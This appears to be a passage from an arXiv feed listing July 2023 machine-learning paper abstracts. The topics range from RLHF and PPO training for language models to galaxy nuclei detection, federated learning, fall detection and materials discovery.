    There is a parameter ubiquitous throughout the deep learning world: learning rate. There is likewise a ubiquitous question: what should that learning rate be? The true answer to this question is often tedious and time consuming to obtain, and a great deal of arcane knowledge has accumulated in recent years over how to pick and modify learning rates to achieve optimal training performance. Moreover, the long hours spent carefully crafting the perfect learning rate can come to nothing the moment your network architecture, optimizer, dataset, or initial conditions change ever so slightly. But it need not be this way. We propose a new answer to the great learning rate question: the Autonomous Learning Rate Controller. Find it at https://github.com/fastestimator/ARC/tree/v2.0
    Secrets of RLHF in Large Language Models Part I: PPO. (arXiv:2307.04964v1 [cs.CL])
    Large language models (LLMs) have formulated a blueprint for the advancement of artificial general intelligence. Its primary objective is to function as a human-centric (helpful, honest, and harmless) assistant. Alignment with humans assumes paramount significance, and reinforcement learning with human feedback (RLHF) emerges as the pivotal technological paradigm underpinning this pursuit. Current technical routes usually include \textbf{reward models} to measure human preferences, \textbf{Proximal Policy Optimization} (PPO) to optimize policy model outputs, and \textbf{process supervision} to improve step-by-step reasoning capabilities. However, due to the challenges of reward design, environment interaction, and agent training, coupled with huge trial and error cost of large language models, there is a significant barrier for AI researchers to motivate the development of technical alignment and safe landing of LLMs. The stable training of RLHF has still been a puzzle. In the first report, we dissect the framework of RLHF, re-evaluate the inner workings of PPO, and explore how the parts comprising PPO algorithms impact policy agent training. We identify policy constraints being the key factor for the effective implementation of the PPO algorithm. Therefore, we explore the PPO-max, an advanced version of PPO algorithm, to efficiently improve the training stability of the policy model. Based on our main results, we perform a comprehensive analysis of RLHF abilities compared with SFT models and ChatGPT. The absence of open-source implementations has posed significant challenges to the investigation of LLMs alignment. Therefore, we are eager to release technical reports, reward models and PPO codes
    Automated Detection of Double Nuclei Galaxies using GOTHIC and the Discovery of a Large Sample of Dual AGN. (arXiv:2011.12177v4 [astro-ph.GA] UPDATED)
    We present a novel algorithm to detect double nuclei galaxies (DNG) called GOTHIC (Graph BOosted iterated HIll Climbing) - that detects whether a given image of a galaxy has two or more closely separated nuclei. Our aim is to detect samples of dual or multiple active galactic nuclei (AGN) in galaxies. Although galaxy mergers are common, the detection of dual AGN is rare. Their detection is very important as they help us understand the formation of supermassive black hole (SMBH) binaries, SMBH growth and AGN feedback effects in multiple nuclei systems. There is thus a need for an algorithm to do a systematic survey of existing imaging data for the discovery of DNGs and dual AGN. We have tested GOTHIC on a known sample of DNGs and subsequently applied it to a sample of a million SDSS DR16 galaxies lying in the redshift range of 0 to 0.75 approximately, and have available spectroscopic data. We have detected 159 dual AGN in this sample, of which 2 are triple AGN systems. Our results show that dual AGN are not common, and triple AGN even rarer. The color (u-r) magnitude plots of the DNGs indicate that star formation is quenched as the nuclei come closer and as the AGN fraction increases. The quenching is especially prominent for dual/triple AGN galaxies that lie in the extreme end of the red sequence.
    Performance Optimization for Variable Bitwidth Federated Learning in Wireless Networks. (arXiv:2209.10200v3 [cs.LG] UPDATED)
    This paper considers improving wireless communication and computation efficiency in federated learning (FL) via model quantization. In the proposed bitwidth FL scheme, edge devices train and transmit quantized versions of their local FL model parameters to a coordinating server, which aggregates them into a quantized global model and synchronizes the devices. The goal is to jointly determine the bitwidths employed for local FL model quantization and the set of devices participating in FL training at each iteration. We pose this as an optimization problem that aims to minimize the training loss of quantized FL under a per-iteration device sampling budget and delay requirement. However, the formulated problem is difficult to solve without (i) a concrete understanding of how quantization impacts global ML performance and (ii) the ability of the server to construct estimates of this process efficiently. To address the first challenge, we analytically characterize how limited wireless resources and induced quantization errors affect the performance of the proposed FL method. Our results quantify how the improvement of FL training loss between two consecutive iterations depends on the device selection and quantization scheme as well as on several parameters inherent to the model being learned. Then, we show that the FL training process can be described as a Markov decision process and propose a model-based reinforcement learning (RL) method to optimize action selection over iterations. Compared to model-free RL, this model-based RL approach leverages the derived mathematical characterization of the FL training process to discover an effective device selection and quantization scheme without imposing additional device communication overhead. Simulation results show that the proposed FL algorithm can reduce the convergence time.
    Improving RNN-Transducers with Acoustic LookAhead. (arXiv:2307.05006v1 [cs.CL])
    RNN-Transducers (RNN-Ts) have gained widespread acceptance as an end-to-end model for speech to text conversion because of their high accuracy and streaming capabilities. A typical RNN-T independently encodes the input audio and the text context, and combines the two encodings by a thin joint network. While this architecture provides SOTA streaming accuracy, it also makes the model vulnerable to strong LM biasing which manifests as multi-step hallucination of text without acoustic evidence. In this paper we propose LookAhead that makes text representations more acoustically grounded by looking ahead into the future within the audio input. This technique yields a significant 5%-20% relative reduction in word error rate on both in-domain and out-of-domain evaluation sets.
    Number Systems for Deep Neural Network Architectures: A Survey. (arXiv:2307.05035v1 [cs.NE])
    Deep neural networks (DNNs) have become an enabling component for a myriad of artificial intelligence applications. DNNs have shown sometimes superior performance, even compared to humans, in cases such as self-driving, health applications, etc. Because of their computational complexity, deploying DNNs in resource-constrained devices still faces many challenges related to computing complexity, energy efficiency, latency, and cost. To this end, several research directions are being pursued by both academia and industry to accelerate and efficiently implement DNNs. One important direction is determining the appropriate data representation for the massive amount of data involved in DNN processing. Using conventional number systems has been found to be sub-optimal for DNNs. Alternatively, a great body of research focuses on exploring suitable number systems. This article aims to provide a comprehensive survey and discussion about alternative number systems for more efficient representations of DNN data. Various number systems (conventional/unconventional) exploited for DNNs are discussed. The impact of these number systems on the performance and hardware design of DNNs is considered. In addition, this paper highlights the challenges associated with each number system and various solutions that are proposed for addressing them. The reader will be able to understand the importance of an efficient number system for DNN, learn about the widely used number systems for DNN, understand the trade-offs between various number systems, and consider various design aspects that affect the impact of number systems on DNN performance. In addition, the recent trends and related research opportunities will be highlighted
    Learned Kernels for Interpretable and Efficient PPG Signal Quality Assessment and Artifact Segmentation. (arXiv:2307.05385v1 [eess.SP])
    Photoplethysmography (PPG) provides a low-cost, non-invasive method to continuously monitor various cardiovascular parameters. PPG signals are generated by wearable devices and frequently contain large artifacts caused by external factors, such as motion of the human subject. In order to ensure robust and accurate extraction of physiological parameters, corrupted areas of the signal need to be identified and handled appropriately. Previous methodology relied either on handcrafted feature detectors or signal metrics which yield sub-optimal performance, or relied on machine learning techniques such as deep neural networks (DNN) which lack interpretability and are computationally and memory intensive. In this work, we present a novel method to learn a small set of interpretable convolutional kernels that has performance similar to -- and often better than -- the state-of-the-art DNN approach with several orders of magnitude fewer parameters. This work allows for efficient, robust, and interpretable signal quality assessment and artifact segmentation on low-power devices.
    Fisher-Weighted Merge of Contrastive Learning Models in Sequential Recommendation. (arXiv:2307.05476v1 [cs.IR])
    Along with the exponential growth of online platforms and services, recommendation systems have become essential for identifying relevant items based on user preferences. The domain of sequential recommendation aims to capture evolving user preferences over time. To address dynamic preference, various contrastive learning methods have been proposed to target data sparsity, a challenge in recommendation systems due to the limited user-item interactions. In this paper, we are the first to apply the Fisher-Merging method to Sequential Recommendation, addressing and resolving practical challenges associated with it. This approach ensures robust fine-tuning by merging the parameters of multiple models, resulting in improved overall performance. Through extensive experiments, we demonstrate the effectiveness of our proposed methods, highlighting their potential to advance the state-of-the-art in sequential learning and recommendation systems.
    Neural network analysis of neutron and X-ray reflectivity data: Incorporating prior knowledge for tackling the phase problem. (arXiv:2307.05364v1 [eess.SP])
    Due to the lack of phase information, determining the physical parameters of multilayer thin films from measured neutron and X-ray reflectivity curves is, on a fundamental level, an underdetermined inverse problem. This so-called phase problem poses limitations on standard neural networks, constraining the range and number of considered parameters in previous machine learning solutions. To overcome this, we present an approach that utilizes prior knowledge to regularize the training process over larger parameter spaces. We demonstrate the effectiveness of our method in various scenarios, including multilayer structures with box model parameterization and a physics-inspired special parameterization of the scattering length density profile for a multilayer structure. By leveraging the input of prior knowledge, we can improve the training dynamics and address the underdetermined ("ill-posed") nature of the problem. In contrast to previous methods, our approach scales favorably when increasing the complexity of the inverse problem, working properly even for a 5-layer multilayer model and an N-layer periodic multilayer model with up to 17 open parameters.
    Uncertainty Quantification of the Virial Black Hole Mass with Conformal Prediction. (arXiv:2307.04993v1 [astro-ph.CO])
    Precise measurements of the black hole mass are essential to gain insight on the black hole and host galaxy co-evolution. A direct measure of the black hole mass is often restricted to nearest galaxies and instead, an indirect method using the single-epoch virial black hole mass estimation is used for objects at high redshifts. However, this method is subjected to biases and uncertainties as it is reliant on the scaling relation from a small sample of local active galactic nuclei. In this study, we propose the application of conformalised quantile regression (CQR) to quantify the uncertainties of the black hole predictions in a machine learning setting. We compare CQR with various prediction interval techniques and demonstrated that CQR can provide a more useful prediction interval indicator. In contrast to baseline approaches for prediction interval estimation, we show that the CQR method provides prediction intervals that adjust to the black hole mass and its related properties. That is it yields a tighter constraint on the prediction interval (hence more certain) for a larger black hole mass, and accordingly, bright and broad spectral line width source. Using a combination of neural network model and CQR framework, the recovered virial black hole mass predictions and uncertainties are comparable to those measured from the Sloan Digital Sky Survey. The code is publicly available at https://github.com/yongsukyee/uncertain_blackholemass.
    CareFall: Automatic Fall Detection through Wearable Devices and AI Methods. (arXiv:2307.05275v1 [cs.LG])
    The aging population has led to a growing number of falls in our society, affecting global public health worldwide. This paper presents CareFall, an automatic Fall Detection System (FDS) based on wearable devices and Artificial Intelligence (AI) methods. CareFall considers the accelerometer and gyroscope time signals extracted from a smartwatch. Two different approaches are used for feature extraction and classification: i) threshold-based, and ii) machine learning-based. Experimental results on two public databases show that the machine learning-based approach, which combines accelerometer and gyroscope information, outperforms the threshold-based approach in terms of accuracy, sensitivity, and specificity. This research contributes to the design of smart and user-friendly solutions to mitigate the negative consequences of falls among older people.
    Fast dynamic time warping and clustering in C++. (arXiv:2307.04904v1 [eess.SP])
    We present an approach for computationally efficient dynamic time warping (DTW) and clustering of time-series data. The method frames the dynamic warping of time series datasets as an optimisation problem solved using dynamic programming, and then clusters time series data by solving a second optimisation problem using mixed-integer programming (MIP). There is also an option to use k-medoids clustering for increased speed, when a certificate for global optimality is not essential. The improved efficiency of our approach is due to task-level parallelisation of the clustering alongside DTW. Our approach was tested using the UCR Time Series Archive, and was found to be, on average, 33% faster than the next fastest option when using the same clustering method. This increases to 64% faster when considering only larger datasets (with more than 1000 time series). The MIP clustering is most effective on small numbers of longer time series, because the DTW computation is faster than other approaches, but the clustering problem becomes increasingly computationally expensive as the number of time series to be clustered increases.
    Robust Inference of Manifold Density and Geometry by Doubly Stochastic Scaling. (arXiv:2209.08004v2 [math.ST] UPDATED)
    The Gaussian kernel and its traditional normalizations (e.g., row-stochastic) are popular approaches for assessing similarities between data points. Yet, they can be inaccurate under high-dimensional noise, especially if the noise magnitude varies considerably across the data, e.g., under heteroskedasticity or outliers. In this work, we investigate a more robust alternative -- the doubly stochastic normalization of the Gaussian kernel. We consider a setting where points are sampled from an unknown density on a low-dimensional manifold embedded in high-dimensional space and corrupted by possibly strong, non-identically distributed, sub-Gaussian noise. We establish that the doubly stochastic affinity matrix and its scaling factors concentrate around certain population forms, and provide corresponding finite-sample probabilistic error bounds. We then utilize these results to develop several tools for robust inference under general high-dimensional noise. First, we derive a robust density estimator that reliably infers the underlying sampling density and can substantially outperform the standard kernel density estimator under heteroskedasticity and outliers. Second, we obtain estimators for the pointwise noise magnitudes, the pointwise signal magnitudes, and the pairwise Euclidean distances between clean data points. Lastly, we derive robust graph Laplacian normalizations that accurately approximate various manifold Laplacians, including the Laplace Beltrami operator, improving over traditional normalizations in noisy settings. We exemplify our results in simulations and on real single-cell RNA-sequencing data. For the latter, we show that in contrast to traditional methods, our approach is robust to variability in technical noise levels across cell types.
    Score Function Gradient Estimation to Widen the Applicability of Decision-Focused Learning. (arXiv:2307.05213v1 [cs.LG])
    Many real-world optimization problems contain unknown parameters that must be predicted prior to solving. To train the predictive machine learning (ML) models involved, the commonly adopted approach focuses on maximizing predictive accuracy. However, this approach does not always lead to the minimization of the downstream task loss. Decision-focused learning (DFL) is a recently proposed paradigm whose goal is to train the ML model by directly minimizing the task loss. However, state-of-the-art DFL methods are limited by the assumptions they make about the structure of the optimization problem (e.g., that the problem is linear) and by the fact that can only predict parameters that appear in the objective function. In this work, we address these limitations by instead predicting \textit{distributions} over parameters and adopting score function gradient estimation (SFGE) to compute decision-focused updates to the predictive model, thereby widening the applicability of DFL. Our experiments show that by using SFGE we can: (1) deal with predictions that occur both in the objective function and in the constraints; and (2) effectively tackle two-stage stochastic optimization problems.
    FairLay-ML: Intuitive Remedies for Unfairness in Data-Driven Social-Critical Algorithms. (arXiv:2307.05029v1 [cs.LG])
    This thesis explores open-sourced machine learning (ML) model explanation tools to understand whether these tools can allow a layman to visualize, understand, and suggest intuitive remedies to unfairness in ML-based decision-support systems. Machine learning models trained on datasets biased against minority groups are increasingly used to guide life-altering social decisions, prompting the urgent need to study their logic for unfairness. Due to this problem's impact on vast populations of the general public, it is critical for the layperson -- not just subject matter experts in social justice or machine learning experts -- to understand the nature of unfairness within these algorithms and the potential trade-offs. Existing research on fairness in machine learning focuses mostly on the mathematical definitions and tools to understand and remedy unfair models, with some directly citing user-interactive tools as necessary for future work. This thesis presents FairLay-ML, a proof-of-concept GUI integrating some of the most promising tools to provide intuitive explanations for unfair logic in ML models by integrating existing research tools (e.g. Local Interpretable Model-Agnostic Explanations) with existing ML-focused GUI (e.g. Python Streamlit). We test FairLay-ML using models of various accuracy and fairness generated by an unfairness detector tool, Parfait-ML, and validate our results using Themis. Our study finds that the technology stack used for FairLay-ML makes it easy to install and provides real-time black-box explanations of pre-trained models to users. Furthermore, the explanations provided translate to actionable remedies.
    M$^2$Hub: Unlocking the Potential of Machine Learning for Materials Discovery. (arXiv:2307.05378v1 [cond-mat.mtrl-sci])
    We introduce M$^2$Hub, a toolkit for advancing machine learning in materials discovery. Machine learning has achieved remarkable progress in modeling molecular structures, especially biomolecules for drug discovery. However, the development of machine learning approaches for modeling materials structures lag behind, which is partly due to the lack of an integrated platform that enables access to diverse tasks for materials discovery. To bridge this gap, M$^2$Hub will enable easy access to materials discovery tasks, datasets, machine learning methods, evaluations, and benchmark results that cover the entire workflow. Specifically, the first release of M$^2$Hub focuses on three key stages in materials discovery: virtual screening, inverse design, and molecular simulation, including 9 datasets that covers 6 types of materials with 56 tasks across 8 types of material properties. We further provide 2 synthetic datasets for the purpose of generative tasks on materials. In addition to random data splits, we also provide 3 additional data partitions to reflect the real-world materials discovery scenarios. State-of-the-art machine learning methods (including those are suitable for materials structures but never compared in the literature) are benchmarked on representative tasks. Our codes and library are publicly available at https://github.com/yuanqidu/M2Hub.
    Conformalization of Sparse Generalized Linear Models. (arXiv:2307.05109v1 [cs.LG])
    Given a sequence of observable variables $\{(x_1, y_1), \ldots, (x_n, y_n)\}$, the conformal prediction method estimates a confidence set for $y_{n+1}$ given $x_{n+1}$ that is valid for any finite sample size by merely assuming that the joint distribution of the data is permutation invariant. Although attractive, computing such a set is computationally infeasible in most regression problems. Indeed, in these cases, the unknown variable $y_{n+1}$ can take an infinite number of possible candidate values, and generating conformal sets requires retraining a predictive model for each candidate. In this paper, we focus on a sparse linear model with only a subset of variables for prediction and use numerical continuation techniques to approximate the solution path efficiently. The critical property we exploit is that the set of selected variables is invariant under a small perturbation of the input data. Therefore, it is sufficient to enumerate and refit the model only at the change points of the set of active features and smoothly interpolate the rest of the solution via a Predictor-Corrector mechanism. We show how our path-following algorithm accurately approximates conformal prediction sets and illustrate its performance using synthetic and real data examples.
    SuryaKiran at MEDIQA-Sum 2023: Leveraging LoRA for Clinical Dialogue Summarization. (arXiv:2307.05162v1 [cs.CL])
    Finetuning Large Language Models helps improve the results for domain-specific use cases. End-to-end finetuning of large language models is time and resource intensive and has high storage requirements to store the finetuned version of the large language model. Parameter Efficient Fine Tuning (PEFT) methods address the time and resource challenges by keeping the large language model as a fixed base and add additional layers, which the PEFT methods finetune. This paper demonstrates the evaluation results for one such PEFT method Low Rank Adaptation (LoRA), for Clinical Dialogue Summarization. The evaluation results show that LoRA works at par with end-to-end finetuning for a large language model. The paper presents the evaluations done for solving both the Subtask A and B from ImageCLEFmedical {https://www.imageclef.org/2023/medical}
    Portfolio Optimization: A Comparative Study. (arXiv:2307.05048v1 [q-fin.PM])
    Portfolio optimization has been an area that has attracted considerable attention from the financial research community. Designing a profitable portfolio is a challenging task involving precise forecasting of future stock returns and risks. This chapter presents a comparative study of three portfolio design approaches, the mean-variance portfolio (MVP), hierarchical risk parity (HRP)-based portfolio, and autoencoder-based portfolio. These three approaches to portfolio design are applied to the historical prices of stocks chosen from ten thematic sectors listed on the National Stock Exchange (NSE) of India. The portfolios are designed using the stock price data from January 1, 2018, to December 31, 2021, and their performances are tested on the out-of-sample data from January 1, 2022, to December 31, 2022. Extensive results are analyzed on the performance of the portfolios. It is observed that the performance of the MVP portfolio is the best on the out-of-sample data for the risk-adjusted returns. However, the autoencoder portfolios outperformed their counterparts on annual returns.
    Differentially Private Statistical Inference through $\beta$-Divergence One Posterior Sampling. (arXiv:2307.05194v1 [stat.ML])
    Differential privacy guarantees allow the results of a statistical analysis involving sensitive data to be released without compromising the privacy of any individual taking part. Achieving such guarantees generally requires the injection of noise, either directly into parameter estimates or into the estimation process. Instead of artificially introducing perturbations, sampling from Bayesian posterior distributions has been shown to be a special case of the exponential mechanism, producing consistent, and efficient private estimates without altering the data generative process. The application of current approaches has, however, been limited by their strong bounding assumptions which do not hold for basic models, such as simple linear regressors. To ameliorate this, we propose $\beta$D-Bayes, a posterior sampling scheme from a generalised posterior targeting the minimisation of the $\beta$-divergence between the model and the data generating process. This provides private estimation that is generally applicable without requiring changes to the underlying model and consistently learns the data generating parameter. We show that $\beta$D-Bayes produces more precise inference estimation for the same privacy guarantees, and further facilitates differentially private estimation via posterior sampling for complex classifiers and continuous regression models such as neural networks for the first time.
    A Mapping Study of Machine Learning Methods for Remaining Useful Life Estimation of Lead-Acid Batteries. (arXiv:2307.05163v1 [cs.LG])
    Energy storage solutions play an increasingly important role in modern infrastructure and lead-acid batteries are among the most commonly used in the rechargeable category. Due to normal degradation over time, correctly determining the battery's State of Health (SoH) and Remaining Useful Life (RUL) contributes to enhancing predictive maintenance, reliability, and longevity of battery systems. Besides improving the cost savings, correct estimation of the SoH can lead to reduced pollution though reuse of retired batteries. This paper presents a mapping study of the state-of-the-art in machine learning methods for estimating the SoH and RUL of lead-acid batteries. These two indicators are critical in the battery management systems of electric vehicles, renewable energy systems, and other applications that rely heavily on this battery technology. In this study, we analyzed the types of machine learning algorithms employed for estimating SoH and RUL, and evaluated their performance in terms of accuracy and inference time. Additionally, this mapping identifies and analyzes the most commonly used combinations of sensors in specific applications, such as vehicular batteries. The mapping concludes by highlighting potential gaps and opportunities for future research, which lays the foundation for further advancements in the field.
    Tracking Most Significant Shifts in Nonparametric Contextual Bandits. (arXiv:2307.05341v1 [stat.ML])
    We study nonparametric contextual bandits where Lipschitz mean reward functions may change over time. We first establish the minimax dynamic regret rate in this less understood setting in terms of number of changes $L$ and total-variation $V$, both capturing all changes in distribution over context space, and argue that state-of-the-art procedures are suboptimal in this setting. Next, we tend to the question of an adaptivity for this setting, i.e. achieving the minimax rate without knowledge of $L$ or $V$. Quite importantly, we posit that the bandit problem, viewed locally at a given context $X_t$, should not be affected by reward changes in other parts of context space $\cal X$. We therefore propose a notion of change, which we term experienced significant shifts, that better accounts for locality, and thus counts considerably less changes than $L$ and $V$. Furthermore, similar to recent work on non-stationary MAB (Suk & Kpotufe, 2022), experienced significant shifts only count the most significant changes in mean rewards, e.g., severe best-arm changes relevant to observed contexts. Our main result is to show that this more tolerant notion of change can in fact be adapted to.
    Distributed Pruning Towards Tiny Neural Networks in Federated Learning. (arXiv:2212.01977v2 [cs.LG] UPDATED)
    Neural network pruning is an essential technique for reducing the size and complexity of deep neural networks, enabling large-scale models on devices with limited resources. However, existing pruning approaches heavily rely on training data for guiding the pruning strategies, making them ineffective for federated learning over distributed and confidential datasets. Additionally, the memory- and computation-intensive pruning process becomes infeasible for recourse-constrained devices in federated learning. To address these challenges, we propose FedTiny, a distributed pruning framework for federated learning that generates specialized tiny models for memory- and computing-constrained devices. We introduce two key modules in FedTiny to adaptively search coarse- and finer-pruned specialized models to fit deployment scenarios with sparse and cheap local computation. First, an adaptive batch normalization selection module is designed to mitigate biases in pruning caused by the heterogeneity of local data. Second, a lightweight progressive pruning module aims to finer prune the models under strict memory and computational budgets, allowing the pruning policy for each layer to be gradually determined rather than evaluating the overall model structure. The experimental results demonstrate the effectiveness of FedTiny, which outperforms state-of-the-art approaches, particularly when compressing deep models to extremely sparse tiny models. FedTiny achieves an accuracy improvement of 2.61% while significantly reducing the computational cost by 95.91% and the memory footprint by 94.01% compared to state-of-the-art methods.
    Improving Image-Based Precision Medicine with Uncertainty-Aware Causal Models. (arXiv:2305.03829v2 [cs.LG] UPDATED)
    Image-based precision medicine aims to personalize treatment decisions based on an individual's unique imaging features so as to improve their clinical outcome. Machine learning frameworks that integrate uncertainty estimation as part of their treatment recommendations would be safer and more reliable. However, little work has been done in adapting uncertainty estimation techniques and validation metrics for precision medicine. In this paper, we use Bayesian deep learning for estimating the posterior distribution over factual and counterfactual outcomes on several treatments. This allows for estimating the uncertainty for each treatment option and for the individual treatment effects (ITE) between any two treatments. We train and evaluate this model to predict future new and enlarging T2 lesion counts on a large, multi-center dataset of MR brain images of patients with multiple sclerosis, exposed to several treatments during randomized controlled trials. We evaluate the correlation of the uncertainty estimate with the factual error, and, given the lack of ground truth counterfactual outcomes, demonstrate how uncertainty for the ITE prediction relates to bounds on the ITE error. Lastly, we demonstrate how knowledge of uncertainty could modify clinical decision-making to improve individual patient and clinical trial outcomes.
    Deep Probabilistic Movement Primitives with a Bayesian Aggregator. (arXiv:2307.05141v1 [cs.RO])
    Movement primitives are trainable parametric models that reproduce robotic movements starting from a limited set of demonstrations. Previous works proposed simple linear models that exhibited high sample efficiency and generalization power by allowing temporal modulation of movements (reproducing movements faster or slower), blending (merging two movements into one), via-point conditioning (constraining a movement to meet some particular via-points) and context conditioning (generation of movements based on an observed variable, e.g., position of an object). Previous works have proposed neural network-based motor primitive models, having demonstrated their capacity to perform tasks with some forms of input conditioning or time-modulation representations. However, there has not been a single unified deep motor primitive's model proposed that is capable of all previous operations, limiting neural motor primitive's potential applications. This paper proposes a deep movement primitive architecture that encodes all the operations above and uses a Bayesian context aggregator that allows a more sound context conditioning and blending. Our results demonstrate our approach can scale to reproduce complex motions on a larger variety of input choices compared to baselines while maintaining operations of linear movement primitives provide.
    Probabilistic Counterexample Guidance for Safer Reinforcement Learning. (arXiv:2307.04927v1 [cs.LG])
    Safe exploration aims at addressing the limitations of Reinforcement Learning (RL) in safety-critical scenarios, where failures during trial-and-error learning may incur high costs. Several methods exist to incorporate external knowledge or to use proximal sensor data to limit the exploration of unsafe states. However, reducing exploration risks in unknown environments, where an agent must discover safety threats during exploration, remains challenging. In this paper, we target the problem of safe exploration by guiding the training with counterexamples of the safety requirement. Our method abstracts both continuous and discrete state-space systems into compact abstract models representing the safety-relevant knowledge acquired by the agent during exploration. We then exploit probabilistic counterexample generation to construct minimal simulation submodels eliciting safety requirement violations, where the agent can efficiently train offline to refine its policy towards minimising the risk of safety violations during the subsequent online exploration. We demonstrate our method's effectiveness in reducing safety violations during online exploration in preliminary experiments by an average of 40.3% compared with QL and DQN standard algorithms and 29.1% compared with previous related work, while achieving comparable cumulative rewards with respect to unrestricted exploration and alternative approaches.
    One-Versus-Others Attention: Scalable Multimodal Integration. (arXiv:2307.05435v1 [cs.LG])
    Multimodal learning models have become increasingly important as they surpass single-modality approaches on diverse tasks ranging from question-answering to autonomous driving. Despite the importance of multimodal learning, existing efforts focus on NLP applications, where the number of modalities is typically less than four (audio, video, text, images). However, data inputs in other domains, such as the medical field, may include X-rays, PET scans, MRIs, genetic screening, clinical notes, and more, creating a need for both efficient and accurate information fusion. Many state-of-the-art models rely on pairwise cross-modal attention, which does not scale well for applications with more than three modalities. For $n$ modalities, computing attention will result in $n \choose 2$ operations, potentially requiring considerable amounts of computational resources. To address this, we propose a new domain-neutral attention mechanism, One-Versus-Others (OvO) attention, that scales linearly with the number of modalities and requires only $n$ attention operations, thus offering a significant reduction in computational complexity compared to existing cross-modal attention algorithms. Using three diverse real-world datasets as well as an additional simulation experiment, we show that our method improves performance compared to popular fusion techniques while decreasing computation costs.
    Restoring the saturation response of a PMT using pulse-shape and artificial-neural-networks. (arXiv:2302.06170v3 [physics.ins-det] UPDATED)
    The linear response of a photomultiplier tube (PMT) is a required property for photon counting and reconstruction of the neutrino energy. The linearity valid region and the saturation response of PMT were investigated using a linear-alkyl-benzene (LAB)-based liquid scintillator. A correlation was observed between the two different saturation responses, with pulse-shape distortion and pulse-area decrease. The observed pulse-shape provides useful information for the estimation of the linearity region relative to the pulse-area. This correlation-based diagnosis allows an ${in}$-${situ}$ estimation of the linearity range, which was previously challenging. The measured correlation between the two saturation responses was employed to train an artificial-neural-network (ANN) to predict the decrease in pulse-area from the observed pulse-shape. The ANN-predicted pulse-area decrease enables the prediction of the ideal number of photoelectrons irrelevant to the saturation behavior. This pulse-shape-based machine learning technique offers a novel method for restoring the saturation response of PMTs.
    Hierarchical Classification of Research Fields in the "Web of Science" Using Deep Learning. (arXiv:2302.00390v2 [cs.DL] UPDATED)
    This paper presents a hierarchical classification system that automatically categorizes a scholarly publication using its abstract into a three-tier hierarchical label set (discipline, field, subfield) in a multi-class setting. This system enables a holistic categorization of research activities in the mentioned hierarchy in terms of knowledge production through articles and impact through citations, permitting those activities to fall into multiple categories. The classification system distinguishes 44 disciplines, 718 fields and 1,485 subfields among 160 million abstract snippets in Microsoft Academic Graph (version 2018-05-17). We used batch training in a modularized and distributed fashion to address and allow for interdisciplinary and interfield classifications in single-label and multi-label settings. In total, we have conducted 3,140 experiments in all considered models (Convolutional Neural Networks, Recurrent Neural Networks, Transformers). The classification accuracy is > 90% in 77.13% and 78.19% of the single-label and multi-label classifications, respectively. We examine the advantages of our classification by its ability to better align research texts and output with disciplines, to adequately classify them in an automated way, and to capture the degree of interdisciplinarity. The proposed system (a set of pre-trained models) can serve as a backbone to an interactive system for indexing scientific publications in the future.
    Simplicial Message Passing for Chemical Property Prediction. (arXiv:2307.05392v1 [cond-mat.mtrl-sci])
    Recently, message-passing Neural networks (MPNN) provide a promising tool for dealing with molecular graphs and have achieved remarkable success in facilitating the discovery and materials design with desired properties. However, the classical MPNN methods also suffer from a limitation in capturing the strong topological information hidden in molecular structures, such as nonisomorphic graphs. To address this problem, this work proposes a Simplicial Message Passing (SMP) framework to better capture the topological information from molecules, which can break through the limitation within the vanilla message-passing paradigm. In SMP, a generalized message-passing framework is established for aggregating the information from arbitrary-order simplicial complex, and a hierarchical structure is elaborated to allow information exchange between different order simplices. We apply the SMP framework within deep learning architectures for quantum-chemical properties prediction and achieve state-of-the-art results. The results show that compared to traditional MPNN, involving higher-order simplex can better capture the complex structure of molecules and substantially enhance the performance of tasks. The SMP-based model can provide a generalized framework for GNNs and aid in the discovery and design of materials with tailored properties for various applications.
    SleepEGAN: A GAN-enhanced Ensemble Deep Learning Model for Imbalanced Classification of Sleep Stages. (arXiv:2307.05362v1 [eess.SP])
    Deep neural networks have played an important role in automatic sleep stage classification because of their strong representation and in-model feature transformation abilities. However, class imbalance and individual heterogeneity which typically exist in raw EEG signals of sleep data can significantly affect the classification performance of any machine learning algorithms. To solve these two problems, this paper develops a generative adversarial network (GAN)-powered ensemble deep learning model, named SleepEGAN, for the imbalanced classification of sleep stages. To alleviate class imbalance, we propose a new GAN (called EGAN) architecture adapted to the features of EEG signals for data augmentation. The generated samples for the minority classes are used in the training process. In addition, we design a cost-free ensemble learning strategy to reduce the model estimation variance caused by the heterogeneity between the validation and test sets, so as to enhance the accuracy and robustness of prediction performance. We show that the proposed method can improve classification accuracy compared to several existing state-of-the-art methods using three public sleep datasets.
    Stochastic Nested Compositional Bi-level Optimization for Robust Feature Learning. (arXiv:2307.05384v1 [math.OC])
    We develop and analyze stochastic approximation algorithms for solving nested compositional bi-level optimization problems. These problems involve a nested composition of $T$ potentially non-convex smooth functions in the upper-level, and a smooth and strongly convex function in the lower-level. Our proposed algorithm does not rely on matrix inversions or mini-batches and can achieve an $\epsilon$-stationary solution with an oracle complexity of approximately $\tilde{O}_T(1/\epsilon^{2})$, assuming the availability of stochastic first-order oracles for the individual functions in the composition and the lower-level, which are unbiased and have bounded moments. Here, $\tilde{O}_T$ hides polylog factors and constants that depend on $T$. The key challenge we address in establishing this result relates to handling three distinct sources of bias in the stochastic gradients. The first source arises from the compositional nature of the upper-level, the second stems from the bi-level structure, and the third emerges due to the utilization of Neumann series approximations to avoid matrix inversion. To demonstrate the effectiveness of our approach, we apply it to the problem of robust feature learning for deep neural networks under covariate shift, showcasing the benefits and advantages of our methodology in that context.
    Choosing Well Your Opponents: How to Guide the Synthesis of Programmatic Strategies. (arXiv:2307.04893v1 [cs.LG])
    This paper introduces Local Learner (2L), an algorithm for providing a set of reference strategies to guide the search for programmatic strategies in two-player zero-sum games. Previous learning algorithms, such as Iterated Best Response (IBR), Fictitious Play (FP), and Double-Oracle (DO), can be computationally expensive or miss important information for guiding search algorithms. 2L actively selects a set of reference strategies to improve the search signal. We empirically demonstrate the advantages of our approach while guiding a local search algorithm for synthesizing strategies in three games, including MicroRTS, a challenging real-time strategy game. Results show that 2L learns reference strategies that provide a stronger search signal than IBR, FP, and DO. We also simulate a tournament of MicroRTS, where a synthesizer using 2L outperformed the winners of the two latest MicroRTS competitions, which were programmatic strategies written by human programmers.  ( 2 min )
    Optimized Crystallographic Graph Generation for Material Science. (arXiv:2307.05380v1 [cond-mat.mtrl-sci])
